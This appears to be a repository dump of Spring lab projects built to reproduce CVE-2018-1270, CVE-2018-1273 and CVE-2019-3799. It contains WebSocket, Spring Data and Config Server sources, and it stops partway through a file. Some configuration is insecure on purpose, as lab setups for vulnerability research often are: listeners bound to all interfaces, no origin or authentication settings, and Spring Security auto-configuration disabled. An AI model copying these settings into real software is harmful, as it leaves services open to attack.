--------------------------------------------------------------------------------
package hello;

/**
 * Inbound message carrying the sender-supplied name.
 */
public class HelloMessage {

    private String name;

    public HelloMessage() {
    }

    public HelloMessage(String name) {
        this.name = name;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }
}

--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/java/hello/WebSocketConfig.java:
--------------------------------------------------------------------------------
package hello;

import org.springframework.context.annotation.Configuration;
import org.springframework.messaging.simp.config.MessageBrokerRegistry;
import org.springframework.web.socket.config.annotation.EnableWebSocketMessageBroker;
import org.springframework.web.socket.config.annotation.StompEndpointRegistry;
import org.springframework.web.socket.config.annotation.WebSocketMessageBrokerConfigurer;

/**
 * Message-broker configuration: a simple broker for "/topic", application destinations under
 * "/app", and one STOMP endpoint with SockJS enabled.
 */
@Configuration
@EnableWebSocketMessageBroker
public class WebSocketConfig implements WebSocketMessageBrokerConfigurer {

    /** Enables the simple broker on "/topic" and routes "/app" destinations to handlers. */
    @Override
    public void configureMessageBroker(MessageBrokerRegistry config) {
        config.enableSimpleBroker("/topic");
        config.setApplicationDestinationPrefixes("/app");
    }

    /**
     * Registers the "/gs-guide-websocket" endpoint with SockJS.
     *
     * <p>NOTE(review): no allowed-origins setting and no authentication are configured in the
     * code shown, so the framework defaults decide who may connect.
     */
    @Override
    public void registerStompEndpoints(StompEndpointRegistry registry) {
        registry.addEndpoint("/gs-guide-websocket").withSockJS();
    }

}
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/resources/application.properties:
--------------------------------------------------------------------------------
# NOTE(review): 0.0.0.0 binds the listener to every interface; bind to loopback
# or an isolated lab network when the endpoint does not need to be reachable.
server.address=0.0.0.0
--------------------------------------------------------------------------------
/CVE-2018-1270/src/main/resources/static/main.css:
--------------------------------------------------------------------------------
body {
    background-color: #f5f5f5;
}

#main-content {
    max-width: 940px;
    padding: 2em 3em;
    margin: 0 auto 20px;
    background-color: #fff;
    border: 1px solid #e5e5e5;
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    border-radius: 5px;
}
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/application.properties:
--------------------------------------------------------------------------------
server.address=0.0.0.0
--------------------------------------------------------------------------------
/CVE-2018-1270/target/classes/hello/Application.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/Application.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/classes/hello/Greeting.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/Greeting.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/classes/hello/GreetingController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/GreetingController.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/classes/hello/HelloMessage.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/HelloMessage.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/classes/hello/WebSocketConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/classes/hello/WebSocketConfig.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/classes/static/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #f5f5f5; 3 | } 4 | 5 | #main-content { 6 | max-width: 940px; 7 | padding: 2em 3em; 8 | margin: 0 auto 20px; 9 | 
background-color: #fff; 10 | border: 1px solid #e5e5e5; 11 | -webkit-border-radius: 5px; 12 | -moz-border-radius: 5px; 13 | border-radius: 5px; 14 | } -------------------------------------------------------------------------------- /CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1$1.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$1.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$TestSessionHandler.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests$TestSessionHandler.class -------------------------------------------------------------------------------- /CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1270/target/test-classes/hello/GreetingIntegrationTests.class -------------------------------------------------------------------------------- /CVE-2018-1273/README.md: -------------------------------------------------------------------------------- 1 
| # Spring Data - web support example 2 | 3 | This example shows some of the Spring Data integration features with Spring MVC. 4 | 5 | 1. See how we plug into Spring MVC to create `Pageable` instances from request parameters in `UserController.users(…)`. 6 | 2. See how interfaces can be used to bind request payloads in `UserController.UserForm`. Spring Data creates a `Map`-backed proxy for you to easily create form-backing objects. -------------------------------------------------------------------------------- /CVE-2018-1273/src/main/java/example/users/UserRepository.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015-2021 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * https://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | package example.users; 17 | 18 | import java.util.Optional; 19 | 20 | import org.springframework.data.repository.PagingAndSortingRepository; 21 | 22 | /** 23 | * A Spring Data repository to persist {@link User}s. 24 | * 25 | * @author Oliver Gierke 26 | */ 27 | interface UserRepository extends PagingAndSortingRepository { 28 | 29 | /** 30 | * Returns the user with the given {@link Username}. 31 | * 32 | * @param username can be {@literal null}. 
33 | * @return 34 | */ 35 | Optional findByUsername(Username username); 36 | } 37 | -------------------------------------------------------------------------------- /CVE-2018-1273/src/main/resources/application.properties: --------------------------------------------------------------------------------
1 | server.address=10.128.5.250
2 | server.port=8099
3 | spring.autoconfigure.exclude=org.springframework.boot.autoconfigure.security.SecurityAutoConfiguration,org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration
4 | # NOTE(review): the exclude above switches off Spring Boot's Spring Security auto-configuration, so none of Boot's default Spring Security protection applies unless the application configures it itself; server.address pins the listener to one fixed host address and has to match the machine running the lab.
-------------------------------------------------------------------------------- /CVE-2018-1273/src/main/resources/messages.properties: -------------------------------------------------------------------------------- 1 | user.username.empty = Username is required! 2 | user.username.exists = Username already exists! 3 | user.username.invalidFormat = Invalid Username format! 4 | user.password.empty = Password is required! 5 | user.password.no-match = The given passwords don't match! 6 | user.repeatedPassword.empty = Repeated password is required!
7 | 8 | -------------------------------------------------------------------------------- /CVE-2018-1273/src/main/resources/static/css/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: auto; 3 | width: 50%; 4 | } 5 | 6 | form.user-form { 7 | padding: 9px 14px; 8 | border: 1px solid #e1e1e8; 9 | border-radius: 4px; 10 | } 11 | 12 | .fieldError { 13 | border: 1px solid #a94442; 14 | } 15 | 16 | .errors { 17 | padding: 1em; 18 | margin: 1em 0; 19 | border: 1px solid #eee; 20 | border-left-width: 5px; 21 | border-left-color: #a94442; 22 | border-radius: 5px; 23 | } 24 | 25 | .errors li { 26 | list-style-type: none; 27 | margin: 0.5em 0.7em; 28 | } 29 | -------------------------------------------------------------------------------- /CVE-2018-1273/src/test/java/example/users/AbstractIntegrationTests.java: -------------------------------------------------------------------------------- 1 | ///* 2 | // * Copyright 2015-2021 the original author or authors. 3 | // * 4 | // * Licensed under the Apache License, Version 2.0 (the "License"); 5 | // * you may not use this file except in compliance with the License. 6 | // * You may obtain a copy of the License at 7 | // * 8 | // * https://www.apache.org/licenses/LICENSE-2.0 9 | // * 10 | // * Unless required by applicable law or agreed to in writing, software 11 | // * distributed under the License is distributed on an "AS IS" BASIS, 12 | // * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | // * See the License for the specific language governing permissions and 14 | // * limitations under the License. 15 | // */ 16 | //package example.users; 17 | // 18 | //import org.springframework.boot.test.context.SpringBootTest; 19 | // 20 | ///** 21 | // * Integration tests to bootstrap the application. 
22 | // * 23 | // * @author Oliver Gierke 24 | // * @author Divya Srivastava 25 | // */ 26 | //@SpringBootTest 27 | //abstract class AbstractIntegrationTests {} 28 | -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.address=10.128.5.250 2 | server.port=8099 3 | spring.autoconfigure.exclude=org.springframework.boot.autoconfigure.security.SecurityAutoConfiguration,org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration 4 | -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/Application.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/Password.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/Password.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/User.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/User.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/UserManagement.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/UserManagement.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/UserRepository.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/UserRepository.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/Username.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/Username.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/web/UserController$UserForm.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/web/UserController$UserForm.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/example/users/web/UserController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2018-1273/target/classes/example/users/web/UserController.class -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/messages.properties: -------------------------------------------------------------------------------- 1 | user.username.empty = Username is required! 
2 | user.username.exists = Username already exists! 3 | user.username.invalidFormat = Invalid Username format! 4 | user.password.empty = Password is required! 5 | user.password.no-match = The given passwords don't match! 6 | user.repeatedPassword.empty = Repeated password is required! 7 | 8 | -------------------------------------------------------------------------------- /CVE-2018-1273/target/classes/static/css/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | margin: auto; 3 | width: 50%; 4 | } 5 | 6 | form.user-form { 7 | padding: 9px 14px; 8 | border: 1px solid #e1e1e8; 9 | border-radius: 4px; 10 | } 11 | 12 | .fieldError { 13 | border: 1px solid #a94442; 14 | } 15 | 16 | .errors { 17 | padding: 1em; 18 | margin: 1em 0; 19 | border: 1px solid #eee; 20 | border-left-width: 5px; 21 | border-left-color: #a94442; 22 | border-radius: 5px; 23 | } 24 | 25 | .errors li { 26 | list-style-type: none; 27 | margin: 0.5em 0.7em; 28 | } 29 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/ConfigServerApplication.java: -------------------------------------------------------------------------------- 1 | package org.springframework.cloud.config.server; 2 | 3 | import org.springframework.boot.autoconfigure.EnableAutoConfiguration; 4 | import org.springframework.boot.builder.SpringApplicationBuilder; 5 | import org.springframework.context.annotation.Configuration; 6 | 7 | @Configuration 8 | @EnableAutoConfiguration 9 | @EnableConfigServer 10 | public class ConfigServerApplication { 11 | 12 | public static void main(String[] args) { 13 | new SpringApplicationBuilder(ConfigServerApplication.class) 14 | .properties("spring.config.name=configserver").run(args); 15 | } 16 | 17 | } 18 | -------------------------------------------------------------------------------- 
/CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/config/ConfigServerConfiguration.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2013-2016 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | * 16 | */ 17 | 18 | package org.springframework.cloud.config.server.config; 19 | 20 | import org.springframework.context.annotation.Bean; 21 | import org.springframework.context.annotation.Configuration; 22 | 23 | /** 24 | * @author Spencer Gibb 25 | */ 26 | @Configuration 27 | public class ConfigServerConfiguration { 28 | class Marker {} 29 | 30 | @Bean 31 | public Marker enableConfigServerMarker() { 32 | return new Marker(); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/diagnostics/GitUriFailureAnalyzer.java: -------------------------------------------------------------------------------- 1 | package org.springframework.cloud.config.server.diagnostics; 2 | 3 | import org.springframework.boot.diagnostics.AbstractFailureAnalyzer; 4 | import org.springframework.boot.diagnostics.FailureAnalysis; 5 | import org.springframework.cloud.config.server.environment.JGitEnvironmentRepository; 6 | 7 | /** 8 | * @author Ryan Baxter 9 | */ 10 | public class GitUriFailureAnalyzer extends AbstractFailureAnalyzer { 11 | 12 
| public static final String DESCRIPTION = "Invalid config server configuration."; 13 | public static final String ACTION = "If you are using the git profile, you need to set a Git URI in your " + 14 | "configuration. If you are using a native profile and have spring.cloud.config.server.bootstrap=true, " + 15 | "you need to use a composite configuration."; 16 | 17 | @Override 18 | protected FailureAnalysis analyze(Throwable rootFailure, IllegalStateException cause) { 19 | if(JGitEnvironmentRepository.MESSAGE.equalsIgnoreCase(cause.getMessage())) { 20 | return new FailureAnalysis(DESCRIPTION, ACTION, cause); 21 | } 22 | return null; 23 | } 24 | 25 | } 26 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/EnvironmentEncryptor.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | package org.springframework.cloud.config.server.encryption; 18 | 19 | import org.springframework.cloud.config.environment.Environment; 20 | 21 | /** 22 | * Service interface for decrypting properties in Environment object. 
23 | * 24 | * @author Bartosz Wojtkiewicz 25 | * @author Rafal Zukowski 26 | * 27 | */ 28 | public interface EnvironmentEncryptor { /** Decrypts the properties of the given environment and returns the resulting {@link Environment}. NOTE(review): whether the argument is mutated or copied is not specified here - confirm in the implementations. */ 29 | Environment decrypt(Environment environment); 30 | } 31 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/PassthruSecretLocator.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | package org.springframework.cloud.config.server.encryption; 18 | 19 | /** 20 | * {@link SecretLocator} that performs no lookup: the string handed to {@code locate} is itself returned as the secret's characters. 21 | * @author Dave Syer 22 | */ 23 | public class PassthruSecretLocator implements SecretLocator { 24 | /** Returns {@code secret} as a character array, or an empty array when {@code secret} is {@code null}. */ 25 | @Override 26 | public char[] locate(String secret) { 27 | return secret==null ? new char[0] : secret.toCharArray(); 28 | } 29 | 30 | } 31 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/SecretLocator.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | package org.springframework.cloud.config.server.encryption; 18 | 19 | /** 20 | * @author Dave Syer 21 | * 22 | */ 23 | public interface SecretLocator { 24 | 25 | char[] locate(String secret); 26 | 27 | } 28 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/encryption/TextEncryptorLocator.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | 17 | package org.springframework.cloud.config.server.encryption; 18 | 19 | import java.util.Map; 20 | 21 | import org.springframework.security.crypto.encrypt.TextEncryptor; 22 | 23 | /** 24 | * @author Dave Syer 25 | * @author Bartosz Wojtkiewicz 26 | * 27 | */ 28 | public interface TextEncryptorLocator { 29 | 30 | TextEncryptor locate(Map keys); 31 | 32 | } 33 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/ConfigurableHttpConnectionFactory.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package org.springframework.cloud.config.server.environment; 17 | 18 | import org.eclipse.jgit.transport.http.HttpConnectionFactory; 19 | 20 | /** 21 | * @author Dylan Roberts 22 | */ 23 | public interface ConfigurableHttpConnectionFactory extends HttpConnectionFactory { 24 | void addConfiguration(MultipleJGitEnvironmentProperties environmentProperties) throws Exception; 25 | } 26 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentNotFoundException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package org.springframework.cloud.config.server.environment; 17 | 18 | import org.springframework.http.HttpStatus; 19 | import org.springframework.web.bind.annotation.ResponseStatus; 20 | 21 | /** 22 | * @author Chids 23 | * 24 | */ 25 | @SuppressWarnings("serial") 26 | @ResponseStatus(code = HttpStatus.NOT_FOUND, reason = "Application Not Found") 27 | public class EnvironmentNotFoundException extends RuntimeException { 28 | 29 | public EnvironmentNotFoundException(String string) { 30 | super(string); 31 | } 32 | 33 | } 34 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentRepository.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2013-2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package org.springframework.cloud.config.server.environment; 17 | 18 | import org.springframework.cloud.config.environment.Environment; 19 | 20 | /** 21 | * @author Dave Syer 22 | * @author Roy Clarkson 23 | */ 24 | public interface EnvironmentRepository { 25 | 26 | Environment findOne(String application, String profile, String label); 27 | 28 | } 29 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentRepositoryFactory.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package org.springframework.cloud.config.server.environment; 17 | 18 | import org.springframework.cloud.config.server.support.EnvironmentRepositoryProperties; 19 | 20 | /** 21 | * @author Dylan Roberts 22 | */ 23 | public interface EnvironmentRepositoryFactory { 24 | T build(P environmentProperties) throws Exception; 25 | } 26 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/EnvironmentWatch.java: -------------------------------------------------------------------------------- 1 | package org.springframework.cloud.config.server.environment; 2 | 3 | /** 4 | * @author Spencer Gibb 5 | */ 6 | public interface EnvironmentWatch { 7 | String watch(String state); 8 | 9 | class Default implements EnvironmentWatch { 10 | 11 | @Override 12 | public String watch(String state) { 13 | return null; 14 | } 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/NoSuchLabelException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | 17 | package org.springframework.cloud.config.server.environment; 18 | 19 | /** 20 | * @author Dave Syer 21 | * 22 | */ 23 | @SuppressWarnings("serial") 24 | public class NoSuchLabelException extends RepositoryException { 25 | 26 | public NoSuchLabelException(String string) { 27 | super(string); 28 | } 29 | 30 | public NoSuchLabelException(String string, Exception e) { 31 | super(string, e); 32 | } 33 | 34 | } 35 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/NoSuchRepositoryException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | 17 | package org.springframework.cloud.config.server.environment; 18 | 19 | /** 20 | * @author Dave Syer 21 | * 22 | */ 23 | @SuppressWarnings("serial") 24 | public class NoSuchRepositoryException extends RepositoryException { 25 | 26 | public NoSuchRepositoryException(String string) { 27 | super(string); 28 | } 29 | 30 | public NoSuchRepositoryException(String string, Exception e) { 31 | super(string, e); 32 | } 33 | 34 | } 35 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/RepositoryException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | 17 | package org.springframework.cloud.config.server.environment; 18 | 19 | /** 20 | * @author Dave Syer 21 | * 22 | */ 23 | @SuppressWarnings("serial") 24 | public class RepositoryException extends RuntimeException { 25 | 26 | public RepositoryException(String string) { 27 | super(string); 28 | } 29 | 30 | public RepositoryException(String message, Throwable cause) { 31 | super(message, cause); 32 | } 33 | 34 | } 35 | -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/environment/SerializableMapPropertySource.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2013-2014 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
15 | */ 16 | package org.springframework.cloud.config.server.environment; 17 | 18 | import java.util.Map; 19 | 20 | class SerializableMapPropertySource { 21 | 22 | private String name; 23 | private Map source; 24 | 25 | public SerializableMapPropertySource(String name, Map source) { 26 | this.name = name; 27 | this.source = source; 28 | } 29 | 30 | public String getName() { 31 | return name; 32 | } 33 | 34 | public Map getSource() { 35 | return source; 36 | } 37 | 38 | } -------------------------------------------------------------------------------- /CVE-2019-3799/src/main/java/org/springframework/cloud/config/server/resource/NoSuchResourceException.java: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2015 the original author or authors. 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 
